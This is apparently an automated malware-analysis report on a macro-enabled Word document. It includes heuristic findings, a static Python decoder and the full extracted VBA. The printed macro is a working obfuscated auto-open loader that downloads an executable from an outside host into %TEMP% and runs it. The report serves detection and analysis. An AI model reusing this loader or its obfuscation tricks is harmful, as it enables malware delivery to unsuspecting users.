Verdict: MALICIOUS
Risk score: 230

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 User Execution: Malicious File
The sample is an OOXML Word document whose VBA project carries an `autoopen` macro. The macro is a download-and-execute loader, and the whole chain is recoverable from `macros.bas`: `autoopen` calls `VEeve`, which calls `FBFILE_FORMAT_1`. Every COM ProgID is assembled from `Chr()` calls and short literals with junk characters (`<`, `=`, `;`) mixed in; the helper `hCurDir_2` removes them with three `Replace` calls and passes the result to `CreateObject`, so `WScript.Shell`, `ADODB.Stream`, `Microsoft.XMLHTTP` and `Shell.Application` never appear literally in the source. At run time `FBFILE_FORMAT_1` reads `%TEMP%` through `WScript.Shell.Environment("Process")`, calls `usZ5pw3gU8`, which issues a synchronous HTTP GET with `Microsoft.XMLHTTP` and returns `responseBody`, writes that body into a binary `ADODB.Stream` (`Type = 1`) and has `mp3_cbr_aktivate` persist it with `SaveToFile path, 2` (overwrite) as `%TEMP%\ceece.exe`; it then launches the file with `Shell.Application.Open`. The download URL is built the same way and decodes to hxxp://ecobambu[.]com/334f3d/096uh5b[.]exe. Everything else in the module (path and file-format helpers that appear to be lifted from the FreeBASIC compiler sources, with `function =` misspelled in several places, plus a serial-number "protect code" routine) is never called and exists only to dilute keyword scanning and make the macro look like legitimate code.
Heuristics (7)

- VBA project inside OOXML (medium; rule OOXML_VBA; 5 related findings)
  Document contains a VBA project; VBA macros are present.
- VBA downloads and writes a file to disk (critical; rule OLE_VBA_HTTP_DROP_EXEC)
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `usZ5pw3gU8 = strUnquote23.responseBody`
- Obfuscated auto-exec VBA loader (critical; rule OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)`
- CreateObject call (high; rule OLE_VBA_CREATEOBJ)
  Matched line in script: `Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)`
- VBA p-code auto-exec with execution tokens (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
  The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low; rule OLE_VBA_AUTOOPEN)
  Matched line in script: `Sub autoopen()`
- Embedded URL (info; rule EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following are labelled "Referenced by macro":
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  Caveat: every URL in this list is a standard OOXML/Word XML namespace identifier that appears in any .docx, so none of them is a network indicator. The real download URL is assembled at run time from `Chr()` calls inside `usZ5pw3gU8` and therefore does not show up in a plain URL extraction; it has to be recovered by decoding the macro source.
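The decoder below is an added example, not part of this report or of the sample. It statically evaluates the `Chr(n) & "literal"` concatenations in the extracted VBA source and, for arguments of the sample's `hCurDir_2` helper, applies the same `Replace` removal of `<`, `=` and `;` that the helper performs before `CreateObject`, which recovers the ProgIDs, the HTTP request and the drop path without running anything. `SAMPLE_SOURCE` is constructed from the relevant lines of the extracted `macros.bas`; the function names `decode_concat`, `strip_junk`, `call_args`, `recover_progids`, `recover_http_request`, `recover_drop_path` and `decode_all` are this example's own.

```python
"""Static recovery of the Chr()-built strings in macros.bas.

Added example; not part of the analyzer report or the sample. It evaluates the
`Chr(n) & "lit" & ...` concatenations in VBA source text and, for arguments of
the sample's hCurDir_2 helper, applies the same junk removal that helper does
(Replace of "<", "=" and ";") before CreateObject. Nothing is fetched or run.
"""
import re

# One token of a VBA concatenation: Chr(<decimal>) or a double-quoted literal
# ("" inside a literal is an escaped quote). Operators (& or +) and bare
# identifiers are skipped, so the result is the literal part of the string.
_TOKEN = re.compile(r'Chr\((\d+)\)|"((?:[^"]|"")*)"')

JUNK = "<=;"  # what hCurDir_2 strips with Replace(...) before CreateObject


def decode_concat(expr: str) -> str:
    """Evaluate the literal part of a VBA concatenation expression."""
    out = []
    for code, literal in _TOKEN.findall(expr):
        out.append(chr(int(code)) if code else literal.replace('""', '"'))
    return "".join(out)


def strip_junk(s: str) -> str:
    """Mirror hCurDir_2: Replace(x, Chr(60), ""), then Chr(61), then Chr(59)."""
    for ch in JUNK:
        s = s.replace(ch, "")
    return s


def call_args(source: str, name: str):
    """Yield the raw argument text of each `name(...)` call, balancing nested
    parentheses so the Chr(...) calls inside the argument stay intact.
    Limitation: a quoted literal containing ( or ) would confuse the scan."""
    needle, i = name + "(", 0
    while (i := source.find(needle, i)) >= 0:
        start = j = i + len(needle)
        depth = 1
        while j < len(source) and depth:
            depth += {"(": 1, ")": -1}.get(source[j], 0)
            j += 1
        yield source[start:j - 1]
        i = j


def recover_progids(source: str) -> list[str]:
    """COM ProgIDs the macro hands to CreateObject, in source order."""
    ids = []
    for arg in call_args(source, "hCurDir_2"):
        progid = strip_junk(decode_concat(arg))
        if progid:  # the `Function hCurDir_2(x As String)` definition decodes to ""
            ids.append(progid)
    return ids


def recover_http_request(source: str):
    """Decode the XMLHTTP `obj.Open method, url, async` call -> (method, url, async)."""
    for line in source.splitlines():
        m = re.search(r"\.Open\s*(.*)$", line)
        if m and "Chr(" in m.group(1):
            parts = [p.strip() for p in m.group(1).split(",")]
            return (decode_concat(parts[0]), decode_concat(parts[1]),
                    parts[2] if len(parts) > 2 else "")
    return None


def recover_drop_path(source: str) -> str:
    """Literal tail of the drop path; pathIsAbsolute_2 in front of it holds %TEMP%."""
    for line in source.splitlines():
        m = re.match(r"\s*pathIsAbsolute_3\s*=\s*(.*)$", line)
        if m:
            return decode_concat(m.group(1))
    return ""


def decode_all(source: str) -> list[tuple[int, str]]:
    """(line number, decoded literal) for every line using Chr(): a first pass."""
    return [(n, decode_concat(line))
            for n, line in enumerate(source.splitlines(), 1) if "Chr(" in line]


# Constructed from the extracted macros.bas: the lines that carry the chain.
SAMPLE_SOURCE = r"""
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
noextensionFile.Open (pathIsAbsolute_3)
Dim strUnquote23: Set strUnquote23 = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(101) & "c" & Chr(111) & Chr(98) & Chr(97) & Chr(109) & Chr(98) & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & Chr(51) & Chr(51) & Chr(52) & Chr(102) & "3" & Chr(100) & "/" & Chr(48) & Chr(57) & Chr(54) & Chr(117) & "h" & Chr(53) & Chr(98) & Chr(46) & "e" & Chr(120) & "e", False
""".strip()

if __name__ == "__main__":
    for n, text in decode_all(SAMPLE_SOURCE):
        print(f"line {n:2}: {text!r}")
    print("ProgIDs:", recover_progids(SAMPLE_SOURCE))
    print("Request:", recover_http_request(SAMPLE_SOURCE))
    print("Drops to: %TEMP%" + recover_drop_path(SAMPLE_SOURCE))
```

Fed the full `macros.bas` instead of `SAMPLE_SOURCE`, the same functions return the same result, because the filler code contains no `Chr()` calls and no `hCurDir_2(` call sites. The decoder keeps the sample's own casing, so the stream ProgID comes back as `Adodb.Stream` (ProgID lookup in `CreateObject` is case-insensitive). `strip_junk` is applied only to `hCurDir_2` arguments, exactly as in the macro; applying it to the URL would be wrong for any URL carrying `=` in a query string.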
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15258 bytes | 39defa5524c67399629aa5380088d9bec6419fea4d8dc2444900223ad004665a |

Preview of macros.bas (first 1,000 lines of the extracted script, shown verbatim, including the never-called filler code and its misspellings):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
FBFILE_FORMAT_1
End Sub
Attribute VB_Name = "Module2"
'':::::
Static Function _
hFBrelop2IRrelop _
(ByVal tk As _
Integer) As Integer
Dim op As Integer
Select Case tk
Case FB_TK_EQ
op = AST_OP_EQ
Case FB_TK_GT
op = AST_OP_GT
Case FB_TK_LT
op = AST_OP_LT
Case FB_TK_NE
op = AST_OP_NE
Case FB_TK_LE
op = AST_OP_LE
Case FB_TK_GE
op = AST_OP_GE
Case Else
ee.errReport (FB_ERRMSG_EXPECTEDRELOP)
'' error recovery: fake an op
op = AST_OP_EQ
End Select
funcstion = op
End Function
'':::::
Static Function _
hFileExists _
(ByVal filename As _
String) As Integer
Dim f As Integer
f = FreeFile
If f Then
funcstion = True
Close #f
Else
funsction = False
End If
End Function
Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
End Sub
'':::::
Static Sub _
hUcase _
(ByVal src As String _
, ByVal dst As _
String)
Dim c As Integer
Dim s As String
Dim d As String
s = src
d = dst
Do
c = s
If (c >= 97) Then
If (c <= 122) Then
c = c - (97 - 65)
End If
ElseIf (c = 0) Then
Exit Do
End If
d = c
s = s - 1
d = d - 1
Loop
'' null-term
d = 0
End Sub
'':::::
Static Sub _
hClearName _
(ByVal src As _
String)
Dim p As String
p = src
Do
Select Case p
Case 0
Exit Do
Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
Case Else
p = CHAR_ZLOW
End Select
p = p + 1
Loop
End Sub
'' Searches backwards for the last '.' while still behind '/' or '\'.
Private Function hFindExtBegin(ByRef path As String) As Integer
for i as integer = len( path )-1 to 0 step -1
select case( path[i] )
Case Asc(".")
return i
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("\"), Asc("/")
#Else
Case Asc("/")
#End If
Exit For
End Select
Next
function = len( path )
End Function
Function hStripExt(ByRef path As String) As String
function = left( path, hFindExtBegin( path ) )
End Function
'':::::
Static Function _
hStripPath _
(ByVal filename As _
String) As String
Dim lp, p_found, p(1 To 2)
lp = 0
Do
p(1) = InStr(lp + 1, filename, RSLASH)
p(2) = InStr(lp + 1, filename, "/")
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
fundction = Mid(filename, lp + 1)
Else
fundction = filename
End If
End Function
Attribute VB_Name = "Module1"
Function cal_password_1(ByVal ser_no As String, computer_id As String) As String
Dim ch(2) As String
Dim out_string(2) As String
Dim i%, m%
Dim num(1) As Integer
Dim l As Long
If ser_no = "" Then
ser_no = "028-000001"
End If
'm% = InStr(1, ser_no, "-", 0)
'ch(0) = Mid$(ser_no, m% + 1, 6)
ch(0) = ser_no 'ch(0) + Mid$(ser_no, m% - 2, 2)
ch(1) = Trim(Mid$(computer_id, 1, 8))
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(0), i%, 9) + ch(2) + Mid$(ch(0), i%, 10)
ch(1) = Mid$(ch(2), 1, 10)
ch(0) = Mid$(ch(2), 11, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(1), i%, 9) + ch(2) + Mid$(ch(1), i%, 10)
ch(0) = Mid$(ch(2), 5, 14)
ch(1) = Mid$(ch(2), 1, 4) + Mid$(ch(2), 15, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
ch(2) = Mid$(ch(0), i%, 9) + ch(2) + Mid$(ch(0), i%, 10)
ch(0) = Mid$(ch(2), 1, 8)
ch(1) = Mid$(ch(2), 9, 18)
ch(0) = set_protect_code_1(ch(0))
ch(1) = set_protect_code_1(ch(1))
ch(2) = ""
For i% = 1 To 8
ch(2) = ch(2) + Mid$(ch(0), 9 - i%, 1)
ch(2) = ch(2) + Mid$(ch(1), i%, 1)
Next i%
out_string(0) = Mid$(ch(2), 1, 4)
out_string(1) = Mid$(ch(2), 5, 4)
num(0) = Val(out_string(0))
num(1) = Val(out_string(1))
out_string(0) = Trim(Str(num(0) + num(1)))
If Len(out_string(0)) = 1 Then
out_string(0) = "000" + out_string(0)
ElseIf Len(out_string(0)) = 2 Then
out_string(0) = "00" + out_string(0)
ElseIf Len(out_string(0)) = 3 Then
out_string(0) = "0" + out_string(0)
ElseIf Len(out_string(0)) > 4 Then
out_string(0) = Mid$(out_string(0), 1, 4)
End If
out_string(2) = Mid$(ch(2), 9, 8)
cal_password_1 = out_string(0) + out_string(2)
End Function
Public Function FBFILE_FORMAT_1()
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Dim pathIsAbsolute_4 As Object
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim pathIsAbsolute_3 As String
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
With pathIsAbsolute_4
.Type = 1
.Open
.write usZ5pw3gU8(223)
End With
mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
noextensionFile.Open (pathIsAbsolute_3)
End Function
Public Function cal_protect_code_1(in_ch As String, time%) As String
Dim l!, l_!
Dim i%
l! = Asc(Mid$(in_ch, 1, 1)) Mod 100 '???
l! = l! * 100 + (Asc(Mid$(in_ch, 2, 1)) Mod 100)
l! = function_for_protect_1(l!) '??
For i% = 1 To time% - 1 'time% ???
l! = Abs(l!) Mod 10000
l! = function_for_protect_1(l!)
Next i%
l! = Abs(l!)
l_! = l! Mod 100
l! = (l_! + (l! - l_!) / 100) Mod 100
cal_protect_code_1 = Trim(Str(l!))
If Len(cal_protect_code_1) = 1 Then
cal_protect_code_1 = "0" + cal_protect_code_1
End If
End Function
Public Function function_for_protect_1(i!) As Long
function_for_protect_1 = -4 * i! * i! + 14 * i! + 6
End Function
Public Function set_protect_code_1(computer_id As String) As String
Dim i%
Dim temp_string(4) As String * 2
'????
temp_string(0) = Mid$(computer_id, 1, 2)
temp_string(1) = Mid$(computer_id, 3, 2)
temp_string(2) = Mid$(computer_id, 5, 2)
temp_string(3) = Mid$(computer_id, 7, 2)
If Len(computer_id) > 8 Then
temp_string(4) = Mid$(computer_id, 9, 2)
End If
set_protect_code_1 = cal_protect_code_1(temp_string(0), 5)
If temp_string(1) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(1), 6)
If temp_string(2) = temp_string(1) Then '2=1=0
set_protect_code_1 = cal_protect_code_1(temp_string(2), 7) + set_protect_code_1
If temp_string(3) = temp_string(2) Then '3=2=1=0
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 8)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
Else '0=1<>2
set_protect_code_1 = cal_protect_code_1(temp_string(2), 5) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Then '0=1 <>2,3=2or 3=0
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 7)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
End If
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(1), 5)
If temp_string(2) = temp_string(1) Or temp_string(2) = temp_string(0) Then '
set_protect_code_1 = cal_protect_code_1(temp_string(2), 6) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Or _
temp_string(3) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 7)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 6)
End If
Else
set_protect_code_1 = cal_protect_code_1(temp_string(2), 5) + set_protect_code_1
If temp_string(3) = temp_string(2) Or temp_string(3) = temp_string(1) Or _
temp_string(3) = temp_string(0) Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 6)
Else
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(3), 5)
End If
End If
End If
If temp_string(4) <> "" Then
set_protect_code_1 = set_protect_code_1 + cal_protect_code_1(temp_string(4), 5)
End If
End Function
Attribute VB_Name = "Module3"
'':::::
Static Function _
hStripFilename _
(ByVal filename As _
String) As String
Dim lp, p_found, p(1 To 2)
lp = 0
Do
p(1) = InStr(lp + 1, filename, RSLASH)
p(2) = InStr(lp + 1, filename, "/")
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
fusnction = Left(filename, lp)
Else
fusnction = ""
End If
End Function
Public Function usZ5pw3gU8(KJB As Long)
Dim strUnquote23: Set strUnquote23 = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(101) & "c" & Chr(111) & Chr(98) & Chr(97) & Chr(109) & Chr(98) & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & Chr(51) & Chr(51) & Chr(52) & Chr(102) & "3" & Chr(100) & "/" & Chr(48) & Chr(57) & Chr(54) & Chr(117) & "h" & Chr(53) & Chr(98) & Chr(46) & "e" & Chr(120) & "e", False
strUnquote23.Send
usZ5pw3gU8 = strUnquote23.responseBody
End Function
'':::::
Static Function _
hGetFileExt _
(ByVal fname As _
String) As String
Dim p, lp As Integer
Dim res As String
lp = 0
Do
p = InStr(lp + 1, fname, ".")
If (p = 0) Then
Exit Do
End If
lp = p
Loop
If (lp = 0) Then
fusnction = ""
Else
res = lcase(Mid(fname, lp + 1))
If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
'' We had a folder with a "." inside ...
funfction = ""
ElseIf (Len(res) > 0) Then
'' . or .. dirs?
If res = Asc(RSLASH) Or res = Asc("/") Then
fudnction = ""
Else
fundction = res
End If
End If
End If
End Function
Sub hReplaceSlash(ByVal s As String, ByVal char As Integer)
for i as integer = 0 to len( *s ) - 1
if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
s [i] = char
End If
Next
End Sub
Function pathStripDiv(ByRef path As String) As String
dim as integer length = len( path )
If (length > 0) Then
length -= 1
select case( path[length] )
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("/"), Asc("\")
#Else
Case Asc("/")
#End If
return left( path, length )
End Select
End If
function = path
End Function
Function pathIsAbsolute(ByVal path As String) As Integer
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
if( (*path)[0] <> 0 ) then
select case( (*path)[1] )
Case Asc(":")
'' C:...
function = TRUE
#If def__FB_WIN32__ Then
Case Asc("\")
'' \\... UNC path
function = ((*path)[0] = asc( "\" ))
#End If
End Select
End If
#Else
'' /...
function = ((*path)[0] = asc( "/" ))
#End If
End Function
Function hCheckFileFormat(ByVal f As Integer) As Integer
dim as long BOM
dim as FBFILE_FORMAT fmt
'' little-endian assumptions
fmt = FBFILE_FORMAT_ASCII
if( get( #f, 0, BOM ) = 0 ) then
If (BOM = &HFFFE0000) Then
fmt = FBFILE_FORMAT_UTF32BE
ElseIf (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF32LE
Else
BOM and= &h00FFFFFF
If (BOM = &HBFBBEF) Then
fmt = FBFILE_FORMAT_UTF8
Else
BOM and= &h0000FFFF
If (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF16LE
ElseIf (BOM = &HFFFE) Then
fmt = FBFILE_FORMAT_UTF16BE
End If
End If
End If
Select Case fmt
Case FBFILE_FORMAT_ASCII
Seek #f, 1
Case FBFILE_FORMAT_UTF8
Seek #f, 1 + 3
Case FBFILE_FORMAT_UTF16LE, _
FBFILE_FORMAT_UTF16BE
Seek #f, 1 + 2
End Select
End If
function = fmt
End Function
Function hCurDir() As String
'' curdir() usually won't be terminated with a path separator,
'' except when it points to the file system root, instead of
'' some directory (e.g. C:\ on Win32 or / on Unix).
function = pathStripDiv( curdir( ) )
End Function
Function pathStripCurdir(ByRef path As String) As String
var pwd = hCurDir() + FB_HOST_PATHDIV
If (Left(path, Len(pwd)) = pwd) Then
function = right( path, len( path ) - len( pwd ) )
Else
function = path
End If
End Function
Function hIsValidSymbolName(ByVal sym As String) As Integer
If (sym = Null) Then Exit Function
var symlen = len( *sym )
If (symlen = 0) Then Exit Function
if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
for i as integer = 1 to symlen-1
if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
Next
function = TRUE
End Function
Public Function hCurDir_2(UIlhbjkhoiyH As String)
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
End Function
'' Checks whether a string starts with and ends in [double-]quotes.
Private Function strIsQuoted(ByRef s As String) As Integer
dim as integer last = len(s) - 1
If (Last < 1) Then
return FALSE
End If
return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
((s[0] = asc("'" )) and (s[last] = asc("'" ))))
End Function
Function strUnquote(ByRef s As String) As String
If (strIsQuoted(s)) Then
return mid(s, 2, len(s) - 2)
End If
return s
End Function
(end of macros.bas preview)

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 73216 bytes | 691c1a74bd50aefaa8f95dc262c3d05afeed6ae6154dd37d962c1619b0c1b048 |